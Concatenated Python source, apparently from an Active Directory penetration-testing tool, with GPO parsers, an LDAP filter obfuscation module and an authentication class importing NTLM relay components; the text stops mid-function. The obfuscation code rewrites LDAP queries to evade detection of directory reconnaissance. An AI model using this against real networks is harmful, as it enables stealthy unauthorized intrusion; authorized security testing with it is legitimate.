#!/usr/bin/env python3

class GPO:
    class Helper:
        @staticmethod
        def _parse_inf_file(content):
            """Parse GptTmpl.inf security settings file"""
            sections = {}
            current_section = None
            
            for line in content.splitlines():
                line = line.strip()
                if not line or line.startswith(';'):
                    continue
                    
                if line.startswith('[') and line.endswith(']'):
                    current_section = line[1:-1]
                    sections[current_section] = {}
                elif current_section and '=' in line:
                    key, value = line.split('=', 1)
                    sections[current_section][key.strip()] = value.strip()
                    
            return sections

        @staticmethod
        def _parse_registry_pol(content):
            """Parse Registry.pol files"""
            # This would need a proper PReg file parser
            # For now, return raw data
            return {"raw": content.hex()}

        @staticmethod
        def _parse_scripts_ini(content):
            """Parse scripts.ini files"""
            scripts = {}
            current_section = None
            
            for line in content.splitlines():
                line = line.strip()
                if not line or line.startswith(';'):
                    continue
                    
                if line.startswith('[') and line.endswith(']'):
                    current_section = line[1:-1]
                    scripts[current_section] = []
                elif current_section and '=' in line:
                    scripts[current_section].append(line)
                    
            return scripts

        @staticmethod
        def _parse_preferences(base_path, conn, share):
            """Parse Group Policy Preferences"""
            # This would need XML parsing for various preference types
            # For now, return a list of available preference files
            preferences = []
            try:
                files = conn.listPath(share, base_path)
                for file in files:
                    if file.get_longname() not in ['.', '..']:
                        preferences.append(file.get_longname())
            except Exception as e:
                logging.debug(f"[Get-GPOPolicy] Error listing preferences: {str(e)}")
            return preferences


#!/usr/bin/env python3
from ldap3.extend.standard.PagedSearch import paged_search_generator, paged_search_accumulator
from ldap3.extend import StandardExtendedOperations, ExtendedOperationsRoot
from ldap3 import SUBTREE, DEREF_ALWAYS
from .obfuscate import (
	LdapParser,
	DNParser,
	AttributeParser,
	LdapObfuscate
)

import logging
from powerview.utils.storage import Storage

class CustomStandardExtendedOperations(StandardExtendedOperations):
	def __init__(self, connection, obfuscate=False, no_cache=False):
		super().__init__(connection)
		self.obfuscate = obfuscate
		self.no_cache = no_cache
		self.storage = Storage()

	def paged_search(self,
					 search_base,
					 search_filter,
					 search_scope=SUBTREE,
					 dereference_aliases=DEREF_ALWAYS,
					 attributes=None,
					 size_limit=0,
					 time_limit=0,
					 types_only=False,
					 get_operational_attributes=False,
					 controls=None,
					 paged_size=100,
					 paged_criticality=False,
					 generator=True,
					 no_cache=False):
		
		no_cache = no_cache or self.no_cache

		if not no_cache:
			cached_results = self.storage.get_cached_results(search_base, search_filter, search_scope, attributes)
			if cached_results is not None:
				logging.debug("[CustomStandardExtendedOperations] Returning cached results for query")
				if generator:
					# Return a generator that yields each cached result
					return (entry for entry in cached_results)
				return cached_results
		
		modified_filter = search_filter
		modified_dn = search_base
		
		if self.obfuscate:
			parser = LdapParser(search_filter)
			tokenized_filter = parser.parse()
			#pprint(tokenized_filter)
			#parser.modify_token("Value", "admin", "modifiedSamAccountName")
			parser.comparison_operator_obfuscation()
			parser.prepend_zeros()
			parser.random_wildcards()
			parser.random_hex()
			parser.boolean_operator_obfuscation()
			parser.append_garbage()
			parser.randomize_oid()
			parser.random_casing()
			parser.random_spacing()
			#pprint(parser.get_parsed_structure())
			modified_filter = parser.convert_to_ldap()
			logging.debug("[CustomStandardExtendedOperations] Modified Filter: {}".format(modified_filter))

			dn_parser = DNParser(search_base)
			tokenized_dn = dn_parser.parse()
			dn_parser.dn_hex()
			dn_parser.dn_randomcase()
			dn_parser.random_spacing()
			#dn_parser.dn_random_oid()
			modified_dn = dn_parser.convert_to_dn()
			logging.debug("[CustomStandardExtendedOperations] Modified DN: {}".format(modified_dn))
			#pprint(modified_dn)

			attribute_parser = AttributeParser(attributes)
			attribute_parser.random_oid()
			attribute_parser.random_casing()
			modified_attributes = attribute_parser.get_attributes()
			logging.debug("[CustomStandardExtendedOperations] Modified Attributes: {}".format(modified_attributes))

		if generator:
			results = list(paged_search_generator(self._connection,
										  modified_dn,
										  modified_filter,
										  search_scope,
										  dereference_aliases,
										  attributes,
										  size_limit,
										  time_limit,
										  types_only,
										  get_operational_attributes,
										  controls,
										  paged_size,
										  paged_criticality))
			
			if not no_cache:
				self.storage.cache_results(search_base, search_filter, search_scope, attributes, results)
			return results
		else:
			results = list(paged_search_accumulator(self._connection,
											search_base,
											search_filter,
											search_scope,
											dereference_aliases,
											attributes,
											size_limit,
											time_limit,
											types_only,
											get_operational_attributes,
											controls,
											paged_size,
											paged_criticality))
			
			if not no_cache:
				self.storage.cache_results(search_base, search_filter, search_scope, attributes, results)
			
			return results

class CustomExtendedOperationsRoot(ExtendedOperationsRoot):
	def __init__(self, connection, obfuscate=False, no_cache=False):
		super().__init__(connection)
		self.standard = CustomStandardExtendedOperations(self._connection, obfuscate, no_cache)



#!/usr/bin/env python3
import random
import string
import re
import binascii

from powerview.utils.helpers import (
	is_valid_dn, 
	IDict
)
from powerview.utils.constants import ATTRIBUTE_OID

WILDCARD = "*"
COMMA = ","
COLON = ":"
MAX_RAND = 10

ATTRIBUTE_OID = IDict(ATTRIBUTE_OID)
EXCEPTION_ATTRIBUTES = [
	"objectClass",
	"objectCategory",
	"userAccountControl",
	"msDS-AllowedToActOnBehalfOfOtherIdentity"
]

EXCEPTION_CHARS = [
	WILDCARD,
	COMMA,
	COLON
]

def in_exception(attribute):
	attribute_casefolded = attribute.casefold()

	in_exception_attributes = attribute_casefolded in (e.casefold() for e in EXCEPTION_ATTRIBUTES)
	in_exception_oid = attribute_casefolded in (val.casefold() for val in ATTRIBUTE_OID.values())

	return in_exception_attributes or in_exception_oid

class Operators:
	NOT = '!'
	AND = '&'
	OR = '|'

class LdapToken:
	def __init__(self, content, token_type):
		self.content = content
		self.type = token_type

	def __repr__(self):
		return f"{self.type}: {self.content}"

class LdapParserException(Exception):
	def __init__(self, message):
		super().__init__(message)

class AttributeParser:
	def __init__(self, attributes):
		self.attributes = attributes

	def get_attributes(self):
		return self.attributes

	def random_oid(self):
		for i in range(len(self.attributes)):
			if random.choice([True, False]):
				oid = ATTRIBUTE_OID.get(self.attributes[i])
				self.attributes[i] = oid if oid else self.attributes[i]

	def random_casing(self):
		for i in range(len(self.attributes)):
			self.attributes[i] = LdapObfuscate.casing(self.attributes[i])

class DNParser:
	def __init__(self, dn):
		self.dn = dn
		self.enable_spacing = False

	def parse(self):
		pattern = re.compile(r'([A-Za-z]+)=([^,]+)')
		matches = pattern.findall(self.dn)
		self.parsed_structure = [{"attribute": attr, "value": val} for attr, val in matches]
		return self.parsed_structure

	def dn_hex(self, parsed_structure=None):
		if parsed_structure is None:
			parsed_structure = self.parsed_structure

		for i in range(len(parsed_structure)):
			parsed_structure[i]["value"] = LdapObfuscate.randhex(parsed_structure[i]["value"])

	def dn_randomcase(self, parsed_structure=None):
		if parsed_structure is None:
			parsed_structure = self.parsed_structure

		for i in range(len(parsed_structure)):
			parsed_structure[i]["attribute"] = LdapObfuscate.casing(parsed_structure[i]["attribute"])
			parsed_structure[i]["value"] = LdapObfuscate.casing(parsed_structure[i]["value"])

	def dn_random_oid(self, parsed_structure=None):
		if parsed_structure is None:
			parsed_structure = self.parsed_structure

		for i in range(len(parsed_structure)):
			parsed_structure[i]["attribute"] = ATTRIBUTE_OID.get(parsed_structure[i]["attribute"])

	def convert_to_dn(self, parsed_structure=None):
		if parsed_structure is None:
			parsed_structure = self.parsed_structure

		return ','.join([f"{item['attribute']}={item['value']}" for item in parsed_structure])

	def random_spacing(self):
		self.enable_spacing = True

class LdapParser:
	TOKEN_PATTERNS = {
		'group_start': re.compile(r'\('),
		'group_end': re.compile(r'\)'),
		'boolean_operator': re.compile(r'[&|!]'),
		'comparison_operator': re.compile(r'([<>]?=|:=)'),  # Capture = and :=
		'attribute': re.compile(r'([a-zA-Z0-9-]+)'),  # Match base attributes, including hyphen
		'extensible_match': re.compile(r':([0-9.]+):'),  # Match OID pattern with colons as ExtensibleMatchFilter
		'value': re.compile(r'([^\)]*)')  # Value part (anything not a closing parenthesis)
	}

	def __init__(self, ldap_filter):
		self.ldap_filter = ldap_filter
		self.tokens = []
		self.parsed_structure = []
		self.enable_spacing = False

	def get_parsed_structure(self):
		return self.parsed_structure

	def parse(self):
		self.tokenize()
		self.parsed_structure = self.build_filter_structure()
		return self.parsed_structure

	def tokenize(self):
		cursor = 0
		while cursor < len(self.ldap_filter):
			char = self.ldap_filter[cursor]

			# Match the start of a group
			if self.TOKEN_PATTERNS['group_start'].match(char):
				self.tokens.append(LdapToken(char, 'GroupStart'))
				cursor += 1
			# Match the end of a group
			elif self.TOKEN_PATTERNS['group_end'].match(char):
				self.tokens.append(LdapToken(char, 'GroupEnd'))
				cursor += 1
			# Match boolean operators (&, |, !)
			elif self.TOKEN_PATTERNS['boolean_operator'].match(char):
				self.tokens.append(LdapToken(char, 'BooleanOperator'))
				cursor += 1
			else:
				# Handle attributes with potential extensible match
				attribute_match = self.TOKEN_PATTERNS['attribute'].match(self.ldap_filter[cursor:])
				if attribute_match:
					attribute = attribute_match.group(1)
					cursor += len(attribute)

					# Check if there's an extensible match filter (OID with colons)
					extensible_match = self.TOKEN_PATTERNS['extensible_match'].match(self.ldap_filter[cursor:])
					if extensible_match:
						oid = extensible_match.group(1)
						self.tokens.append(LdapToken(attribute, 'Attribute'))
						self.tokens.append(LdapToken(oid, 'ExtensibleMatchFilter'))
						cursor += len(extensible_match.group(0))  # Move cursor past the OID and colons

						# Match the comparison operator
						comparison_match = self.TOKEN_PATTERNS['comparison_operator'].match(self.ldap_filter[cursor:])
						if comparison_match:
							comparison = comparison_match.group(1)
							self.tokens.append(LdapToken(comparison, 'ComparisonOperator'))
							cursor += len(comparison)

							# Match the value
							value_match = self.TOKEN_PATTERNS['value'].match(self.ldap_filter[cursor:])
							if value_match:
								value = value_match.group(1).strip()
								self.tokens.append(LdapToken(value, 'Value'))
								cursor += len(value)
							else:
								raise ValueError(f"Malformed LDAP filter: value missing after {attribute}")
					else:
						# Handle regular attributes with = or similar comparison operator
						self.tokens.append(LdapToken(attribute, 'Attribute'))

						# Match comparison operator for regular attributes
						comparison_match = self.TOKEN_PATTERNS['comparison_operator'].match(self.ldap_filter[cursor:])
						if comparison_match:
							comparison = comparison_match.group(1)
							self.tokens.append(LdapToken(comparison, 'ComparisonOperator'))
							cursor += len(comparison)

							# Match the value
							value_match = self.TOKEN_PATTERNS['value'].match(self.ldap_filter[cursor:])
							if value_match:
								value = value_match.group(1).strip()
								self.tokens.append(LdapToken(value, 'Value'))
								cursor += len(value)
							else:
								raise ValueError(f"Malformed LDAP filter: value missing after {attribute}")
					
					continue

				cursor += 1  # move forward if no match is found

	def build_filter_structure(self):
		stack = []
		current_filter = []

		for token in self.tokens:
			if token.type == 'GroupStart':
				stack.append(current_filter)
				current_filter = []
			elif token.type == 'GroupEnd':
				last_filter = current_filter
				current_filter = stack.pop()
				current_filter.append(last_filter)
			else:
				current_filter.append({
					"type": token.type,
					"content": token.content
				})

		if stack:
			raise ValueError("Malformed LDAP filter: unmatched parentheses")

		return current_filter

	def random_spacing(self):
		self.enable_spacing = True

	def convert_to_ldap(self, parsed_structure=None):
		if parsed_structure is None:
			parsed_structure = self.parsed_structure

		ldap_string = []
		previous_token_type = None
		skip_random_spacing = False

		for i in range(len(parsed_structure)):
			token = parsed_structure[i]
			if isinstance(token, list):
				ldap_string.append(f"{LdapObfuscate.random_spaces() if not skip_random_spacing and self.enable_spacing else ''}({self.convert_to_ldap(token)}){LdapObfuscate.random_spaces() if not skip_random_spacing and self.enable_spacing else ''}")
			else:
				if token["type"] == "Attribute":
					if in_exception(token["content"]) or parsed_structure[i+1]["type"] == "ExtensibleMatchFilter":
						skip_random_spacing = True
					else:
						skip_random_spacing = False

					ldap_string.append(f"{LdapObfuscate.random_spaces() if self.enable_spacing else ''}{token['content']}{LdapObfuscate.random_spaces() if self.enable_spacing else ''}")
				elif token["type"] == "ComparisonOperator":
					ldap_string.append(f"{LdapObfuscate.random_spaces() if not skip_random_spacing and self.enable_spacing else ''}{token['content']}{LdapObfuscate.random_spaces() if not skip_random_spacing and self.enable_spacing else ''}")
				elif token["type"] == "Value":
					ldap_string.append(f"{LdapObfuscate.random_spaces() if not skip_random_spacing and self.enable_spacing else ''}{token['content']}{LdapObfuscate.random_spaces() if not skip_random_spacing and self.enable_spacing else ''}")
				elif token["type"] == "ExtensibleMatchFilter":
					ldap_string.append(f":{token['content']}:")
				else:
					ldap_string.append(f"{LdapObfuscate.random_spaces() if not skip_random_spacing and self.enable_spacing else ''}{token['content']}{LdapObfuscate.random_spaces() if not skip_random_spacing and self.enable_spacing else ''}")

				previous_token_type = token["type"]

		return ''.join(ldap_string)

	def modify_token(self, token_type, old_value, new_value, parsed_structure=None):
		if parsed_structure is None:
			parsed_structure = self.parsed_structure

		for token in parsed_structure:
			if isinstance(token, list):
				self.modify_token(token_type, old_value, new_value, token)
			elif token["type"] == token_type and token["content"] == old_value:
				token["content"] = new_value

	def remove_token(self, attribute, operator, value, parsed_structure=None):
		if parsed_structure is None:
			parsed_structure = self.parsed_structure

		for i in range(len(parsed_structure)):
			if isinstance(parsed_structure[i], list):
				self.remove_token(attribute, operator, value, parsed_structure[i])
			elif parsed_structure[i]["type"] == "Attribute" and parsed_structure[i]["content"].lower() == attribute.lower() and parsed_structure[i+1]["type"] == "BooleanOperator" and parsed_structure[i+1]["content"].lower() == operator.lower() and parsed_structure[i+2]["type"] == "Value" and parsed_structure[i+2]["content"].lower() == value.lower():
				parsed_structure.pop(i)

	def append_token(self, new_token, parsed_structure=None):
		if parsed_structure is None:
			parsed_structure = self.parsed_structure

		current = parsed_structure
		while isinstance(current[0], list):
			current = current[0]

		current.append(new_token)

	def append_inner_token(self, new_token, parsed_structure=None):
		if parsed_structure is None:
			parsed_structure = self.parsed_structure

		current = parsed_structure
		second_last_list = None

		while isinstance(current[-1], list):
			second_last_list = current
			current = current[-1]

		if second_last_list is not None:
			valid_indices = [i for i, token in enumerate(second_last_list) if isinstance(token, dict) and token['type'] != 'BooleanOperator']

			if valid_indices:
				random_index = random.choice(valid_indices)
				second_last_list.insert(random_index + 1, new_token) 
			else:
				second_last_list.append(new_token)

	def random_casing(self, parsed_structure=None):
		if parsed_structure is None:
			parsed_structure = self.parsed_structure

		for token in parsed_structure:
			if isinstance(token, list):
				self.random_casing(token)
			elif (token["type"] == "Attribute" and in_exception(token["content"])) or (token["type"] == "Value" and token["content"] == WILDCARD) or LdapObfuscate.is_number(token["content"]):
				break
			elif token["type"] == "Value" or token["type"] == "Attribute":
				token["content"] = LdapObfuscate.casing(token["content"])

	def prepend_zeros(self, parsed_structure=None):
		if parsed_structure is None:
			parsed_structure = self.parsed_structure

		for token in parsed_structure:
			if isinstance(token, list):
				self.prepend_zeros(token)
			elif token["type"] == "Value" and token["content"].isdigit():
				token["content"] = '0' * random.randint(1, MAX_RAND) + token["content"]

	def random_hex(self, parsed_structure=None):
		if parsed_structure is None:
			parsed_structure = self.parsed_structure

		for token in parsed_structure:
			if isinstance(token, list):
				self.random_hex(token)
			elif (token["type"] == "Attribute" and in_exception(token["content"])) or (token["type"] == "Value" and token["content"] == WILDCARD) or LdapObfuscate.is_number(token["content"]):
				break
			elif token["type"] == "Value":
				token["content"] = LdapObfuscate.randhex(token["content"])

	def random_wildcards(self, parsed_structure=None):
		if parsed_structure is None:
			parsed_structure = self.parsed_structure

		for token in parsed_structure:
			if isinstance(token, list):
				self.random_wildcards(token)
			elif (token["type"] == "Attribute" and in_exception(token["content"])) or (token["type"] == "Value" and token["content"] == WILDCARD) or LdapObfuscate.is_number(token["content"]) or is_valid_dn(token["content"]):
				break
			elif token["type"] == "Value":
				token["content"] = LdapObfuscate.randwildcards(token["content"])

	def boolean_operator_obfuscation(self, parsed_structure=None):
		if parsed_structure is None:
			parsed_structure = self.parsed_structure

		new_structure = parsed_structure[0]
		nested_boolean_count = random.randint(1, MAX_RAND)
		not_operator_count = 0

		for _ in range(nested_boolean_count):
			random_operator = random.choice([Operators.AND, Operators.OR, Operators.NOT])
			if random_operator == Operators.NOT:
				not_operator_count += 1
			new_structure = [{'type': 'BooleanOperator', 'content': random_operator}, new_structure]

		if not_operator_count % 2 != 0:
			new_structure = [{'type': 'BooleanOperator', 'content': Operators.NOT}, new_structure]

		self.parsed_structure = [new_structure]

	def append_garbage(self, parsed_structure=None):
		if parsed_structure is None:
			parsed_structure = self.parsed_structure

		for i in range(len(parsed_structure)):
			duplicate = random.choice([True, False])
			if isinstance(parsed_structure[i], list):
				self.append_garbage(parsed_structure[i])
			elif (parsed_structure[i]["type"] == "Attribute" and in_exception(parsed_structure[i]["content"])) or (parsed_structure[i]["type"] == "Value" and parsed_structure[i]["content"] == WILDCARD):
				break
			elif parsed_structure[i]["type"] == "Attribute" and duplicate:
				attribute = parsed_structure[i]["content"]
				operator = parsed_structure[i+1]["content"]
				value = parsed_structure[i+2]["content"]
				if LdapObfuscate.is_number(value):
					break
				new_token = [
					{"type":"Attribute", "content": attribute},
					{"type":"ComparisonOperator", "content": operator},
					{"type":"Value", "content": LdapObfuscate.random_string()}
				]
				self.append_inner_token(new_token)

	def randomize_oid(self, parsed_structure=None):
		if parsed_structure is None:
			parsed_structure = self.parsed_structure

		for i in range(len(parsed_structure)):
			token = parsed_structure[i]
			if isinstance(token, list):
				self.randomize_oid(token)
			elif token['type'] == 'Attribute':
				if random.choice([True, False]):
					break
				attribute = token['content']
				oid = ATTRIBUTE_OID.get(attribute)
				if oid and random.choice([True, False]):
					token['content'] = oid

	def comparison_operator_obfuscation(self, parsed_structure=None):
		if parsed_structure is None:
			parsed_structure = self.parsed_structure

		for i in range(len(parsed_structure)):
			token = parsed_structure[i]
			if isinstance(token, list):
				self.comparison_operator_obfuscation(token)
			elif token["type"] == "Attribute" and in_exception(token["content"]):
				break
			elif token["type"] == "ComparisonOperator":
				attribute = parsed_structure[i-1]["content"]
				value = parsed_structure[i+1]["content"]
				if token["content"] == "=" and value == WILDCARD:
					token["content"] = random.choice(
						[
							'>' + '=' * random.randint(2, MAX_RAND),
							'>' + '=' * random.randint(2, MAX_RAND) + '!' * random.randint(2, MAX_RAND),
							'<=' + ''.join(random.choice(['z', 'Z']) for _ in range(random.randint(1, MAX_RAND))) + ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(random.randint(5, MAX_RAND)))
						]
					)
					parsed_structure[i+1]["content"] = ""

				if LdapObfuscate.is_number(value):
					new = [
						{'content': 'objectCategory', 'type': 'Attribute'},
						{'content': '>=', 'type': 'ComparisonOperator'},
						{'content': 'person', 'type': 'Value'}
					]
					numbers = LdapObfuscate.generate_random_number(int(value))
					for condition in numbers.keys():
						for number in numbers[condition]:
							new_token = []
							if condition == "lower":
								new_token.extend([
									{'content': attribute, 'type': 'Attribute'},
									{'content': '>=', 'type': 'ComparisonOperator'},
									{'content': number, 'type': 'Value'}
								])
							elif condition == "greater":
								new_token.extend([
									{'content': attribute, 'type': 'Attribute'},
									{'content': '<=', 'type': 'ComparisonOperator'},
									{'content': number, 'type': 'Value'}
								])
							self.remove_token(
								attribute=attribute,
								operator=token["content"],
								value=value
							)
							self.append_inner_token(new_token)

class LdapObfuscate:
	@staticmethod
	def whitespace(chars):
		result = []
		for i in range(len(chars)):
			prev_char = chars[i-1] if i > 0 else None
			next_char = chars[i+1] if i < len(chars) - 1 else None

			if chars[i] not in string.ascii_letters and next_char not in EXCEPTION_CHARS and prev_char not in EXCEPTION_CHARS:
				spaces = " " * random.randint(0, MAX_RAND)
				result.append(chars[i] + spaces)
			else:
				result.append(chars[i])

		return ''.join(result)

	@staticmethod
	def random_spaces(min_spaces=0, max_spaces=3):
		return ' ' * random.randint(min_spaces, max_spaces)

	@staticmethod
	def random_string(N=10):
		characters = string.ascii_letters + string.digits
		return ''.join(random.choice(characters) for _ in range(N))

	@staticmethod
	def is_number(value):
		return value.lstrip('-').isdigit()

	@staticmethod
	def randhex(chars):
		result = []
		for i in range(len(chars)):
			if chars[i] == WILDCARD or LdapObfuscate.is_number(chars[i]):
				result.append(chars[i])
			else:
				result.append(
					random.choice(
						[
							chars[i],
							"\\{}".format(binascii.hexlify(chars[i].encode('utf-8')).decode('utf-8'))
						]
					)
				)

		return ''.join(result)

	@staticmethod
	def casing(chars):
		result = []
		for i in range(len(chars)):
			if chars[i] in string.ascii_letters:
				result.append(random.choice([chars[i].lower(), chars[i].upper()]))
			else:
				result.append(chars[i])

		return ''.join(result)

	@staticmethod
	def generate_random_number(value: int) -> dict[str, list[int]]:
		random_numbers = {
			"lower": [],
			"greater": []
		}
		
		for _ in range(random.randint(1, 3)):
			random_numbers["lower"].append(str(random.randrange(-random.randint(1, 100000), value - 1)))
		
		for _ in range(random.randint(1, 3)):
			random_numbers["greater"].append(str(random.randrange(value + 1, value + random.randint(1, 100000))))
		
		return random_numbers

	@staticmethod
	def randwildcards(chars):
		result = []
		length = len(chars)
		for i in range(length):
			if i == 0 or i == length - 1:
				result.append(chars[i])
			elif chars[i] in EXCEPTION_CHARS or chars[i-1] in EXCEPTION_CHARS or chars[i+1] in EXCEPTION_CHARS:
				result.append(chars[i])
			else:
				result.append(random.choice([chars[i], WILDCARD + chars[i]]))

		return ''.join(result)


#!/usr/bin/env python3
from impacket.smbconnection import SMBConnection, SessionError
from impacket.smb3structs import FILE_READ_DATA, FILE_WRITE_DATA
from impacket.dcerpc.v5 import samr, epm, transport, rpcrt, rprn, srvs, wkst, scmr, drsuapi
from impacket.dcerpc.v5.rpcrt import DCERPCException, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE
from impacket.spnego import SPNEGO_NegTokenInit, TypesMech, SPNEGO_NegTokenResp 
# for relay used
from impacket.examples.ntlmrelayx.servers.httprelayserver import HTTPRelayServer
from impacket.examples.ntlmrelayx.clients.ldaprelayclient import LDAPRelayClient
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor
from impacket.ntlm import NTLMAuthChallenge, NTLMSSP_AV_FLAGS, AV_PAIRS, NTLMAuthNegotiate, NTLMSSP_NEGOTIATE_SIGN, NTLMSSP_NEGOTIATE_ALWAYS_SIGN, NTLMAuthChallengeResponse, NTLMSSP_NEGOTIATE_KEY_EXCH, NTLMSSP_NEGOTIATE_VERSION, NTLMSSP_NEGOTIATE_UNICODE
from impacket.nt_errors import STATUS_SUCCESS, STATUS_ACCESS_DENIED

from powerview.utils.helpers import (
	get_machine_name,
	host2ip,
	is_valid_fqdn,
	dn2domain,
	is_ipaddress,
	get_principal_dc_address,
	get_system_nameserver
)
from powerview.lib.resolver import (
	LDAP,
	TRUST
)
from powerview.utils.certificate import (
	load_pfx,
	key_to_pem,
	cert_to_pem
)

import ssl
import ldap3
import logging
import sys
from struct import unpack
from time import sleep
import tempfile
from ldap3.operation import bind
from ldap3.core.results import RESULT_SUCCESS, RESULT_STRONGER_AUTH_REQUIRED

class CONNECTION:
	def __init__(self, args):
		self.username = args.username
		self.password = args.password
		self.domain = args.domain
		self.lmhash = args.lmhash
		self.nthash = args.nthash
		self.use_kerberos = args.use_kerberos
		self.simple_auth = args.simple_auth
		self.use_ldap = args.use_ldap
		self.use_ldaps = args.use_ldaps
		self.use_gc = args.use_gc
		self.use_gc_ldaps = args.use_gc_ldaps
		self.proto = None
		self.port = args.port
		self.hashes = args.hashes
		self.auth_aes_key = args.auth_aes_key
		if self.auth_aes_key is not None:
			self.use_kerberos = True
		self.no_pass = args.no_pass
		self.nameserver = args.nameserver
		self.use_system_ns = args.use_system_ns
		self.stack_trace = args.stack_trace

		self.pfx = args.pfx
		self.pfx_pass = None
		self.do_certificate = True if self.pfx is not None else False

		if self.pfx:
			try:
				with open(self.pfx, "rb") as f:
					pfx = f.read()
			except FileNotFoundError as e:
				logging.error(str(e))
				sys.exit(0)

			try:
				logging.debug("Loading certificate without password")
				self.key, self.cert = load_pfx(pfx)
			except ValueError as e:
				if "Invalid password or PKCS12 data" in str(e):
					logging.warning("Certificate requires password. Supply password")
					from getpass import getpass
					self.pfx_pass = getpass("Password:").encode()
					self.key, self.cert = load_pfx(pfx, self.pfx_pass)
			except Exception as e:
				logging.error(f"Unknown error: {str(e)}")
				sys.exit(0)
		
		# auth method
		self.auth_method = ldap3.NTLM
		if self.simple_auth:
			self.auth_method = ldap3.SIMPLE
		elif self.do_certificate:
			self.auth_method = ldap3.SASL

		# relay option
		self.relay = args.relay
		self.relay_host = args.relay_host
		self.relay_port = args.relay_port

		if is_valid_fqdn(args.ldap_address) and not self.use_kerberos:
			_ldap_address = host2ip(args.ldap_address, nameserver=self.nameserver, dns_timeout=5, use_system_ns = self.use_system_ns)
			if not _ldap_address:
				logging.error("Couldn't resolve %s" % args.ldap_address)
				sys.exit(0)
			self.targetIp = _ldap_address
			self.ldap_address = _ldap_address
			args.ldap_address = _ldap_address
		else:
			self.targetIp = args.ldap_address
			self.ldap_address = args.ldap_address

		if args.dc_ip:
			self.dc_ip = args.dc_ip
		else:
			self.dc_ip = self.targetIp
			args.dc_ip = self.dc_ip
	   
		self.kdcHost = self.dc_ip
		self.targetDomain = None
		self.flatname = None

		if not self.use_ldap and not self.use_ldaps and not self.use_gc and not self.use_gc_ldaps:
			self.use_ldaps = True

		self.args = args
		self.ldap_session = None
		self.ldap_server = None

		self.rpc_conn = None
		self.samr = None
		self.TGT = None
		self.TGS = None

		# stolen from https://github.com/the-useless-one/pywerview/blob/master/pywerview/requester.py#L90
		try:
			if ldap3.SIGN and ldap3.ENCRYPT:
				self.sign_and_seal_supported = True
				logging.debug('LDAP sign and seal are supported')
		except AttributeError:
			self.sign_and_seal_supported = False
			logging.debug('LDAP sign and seal are not supported. Install with "pip install ldap3-bleeding-edge"')

		try:
			if ldap3.TLS_CHANNEL_BINDING:
				self.tls_channel_binding_supported = True
				logging.debug('TLS channel binding is supported')
		except AttributeError:
			self.tls_channel_binding_supported = False
			logging.debug('TLS channel binding is not supported Install with "pip install ldap3-bleeding-edge"')

		self.use_sign_and_seal = self.args.use_sign_and_seal
		self.use_channel_binding = self.args.use_channel_binding
		# check sign and cb is supported
		if self.use_sign_and_seal and not self.sign_and_seal_supported:
			logging.warning('LDAP sign and seal are not supported. Ignoring flag')
			self.use_sign_and_seal = False
		elif self.use_channel_binding and not self.tls_channel_binding_supported:
			logging.warning('Channel binding is not supported. Ignoring flag')
			self.use_channel_binding = False

		if self.use_sign_and_seal and self.use_ldaps:
			if self.args.use_ldaps:
				logging.error('Sign and seal not supported with LDAPS')
				sys.exit(-1)
			logging.warning('Sign and seal not supported with LDAPS. Falling back to LDAP')
			self.use_ldap = True
			self.use_ldaps = False
		elif self.use_channel_binding and self.use_ldap:
			if self.args.use_ldap:
				logging.error('TLS channel binding not supported with LDAP')
				sys.exit(-1)
			logging.warning('Channel binding not supported with LDAP. Proceed with LDAPS')
			self.use_ldaps = True
			self.use_ldap = False

	def refresh_domain(self):
		try:
			self.domain = dn2domain(self.ldap_server.info.other.get('defaultNamingContext')[0])
		except:
			pass

	def set_flatname(self, flatname):
		self.flatname = flatname

	def get_flatname(self):
		return self.flatname

	def set_domain(self, domain):
		self.domain = domain.lower()

	def get_domain(self):
		return self.domain.lower()

	def set_targetDomain(self, targetDomain):
		self.targetDomain = targetDomain

	def get_targetDomain(self):
		return self.targetDomain

	def set_username(self, username):
		self.username = username

	def get_username(self):
		return self.username

	def set_password(self, password):
		self.password = password

	def get_password(self):
		return self.password

	def get_TGT(self):
		return self.TGT

	def set_TGT(self, TGT):
		self.TGT = TGT

	def get_TGS(self):
		return self.TGS

	def set_TGS(self, TGS):
		self.TGS = TGS

	def set_dc_ip(self, dc_ip):
		self.dc_ip = dc_ip

	def get_dc_ip(self):
		return self.dc_ip

	def set_ldap_address(self, ldap_address):
		self.ldap_address = ldap_address

	def get_ldap_address(self):
		return self.ldap_address

	def update_temp_ldap_address(self, server):
		ldap_address = ""
		if self.use_kerberos:
			if is_valid_fqdn(server):
				ldap_address = server
			else:
				logging.error("Kerberos authentication requires a valid FQDN, not an IP address.")
				return None
		
		if is_valid_fqdn(server):
			ldap_address = get_principal_dc_address(server, self.nameserver, use_system_ns=self.use_system_ns)
		elif is_ipaddress(server):
			ldap_address = server 
		else:
			logging.error("Invalid server address. Must be either an FQDN or IP address.")
			return None

		self.ldap_address = ldap_address
		self.targetDomain = server.lower()

		return ldap_address

	def get_proto(self):
		return self.proto

	def set_proto(self, proto):
		self.proto = proto

	def get_nameserver(self):
		if not self.nameserver and not self.use_system_ns:
			return get_system_nameserver()
		return self.nameserver or self.use_system_ns

	def set_nameserver(self, nameserver):
		self.nameserver = nameserver

	def who_am_i(self):
		try:
			whoami = self.ldap_session.extend.standard.who_am_i()
			if whoami:
				whoami = whoami.split(":")[-1]
		except ldap3.core.exceptions.LDAPExtensionError:
			whoami = "%s\\%s" % (self.get_domain(), self.get_username())
		return whoami if whoami else "ANONYMOUS"

	def reset_connection(self):
		self.ldap_session.rebind()

	def close(self):
		self.ldap_session.unbind()

	def init_ldap_session(self, ldap_address=None, use_ldap=False, use_gc_ldap=False):
		
		if self.targetDomain and self.targetDomain != self.domain and self.kdcHost:
			self.kdcHost = None

		if use_ldap or use_gc_ldap:
			self.use_ldaps = False
			self.use_gc_ldaps = False

		if self.use_kerberos:
			try:
				if ldap_address and is_ipaddress(ldap_address):
					target = get_machine_name(ldap_address)
				elif self.ldap_address is not None and is_ipaddress(self.ldap_address):
					target = get_machine_name(self.ldap_address)
				else:
					target = self.ldap_address
			except Exception as e:
				logging.warning(f"Failed to get computer hostname. The domain probably does not support NTLM authentication. Skipping...")
				target = self.ldap_address

			if not is_valid_fqdn(target):
				logging.error("Keberos authentication requires FQDN instead of IP")
				sys.exit(0)
		else:
			if ldap_address:
				if is_valid_fqdn(ldap_address):
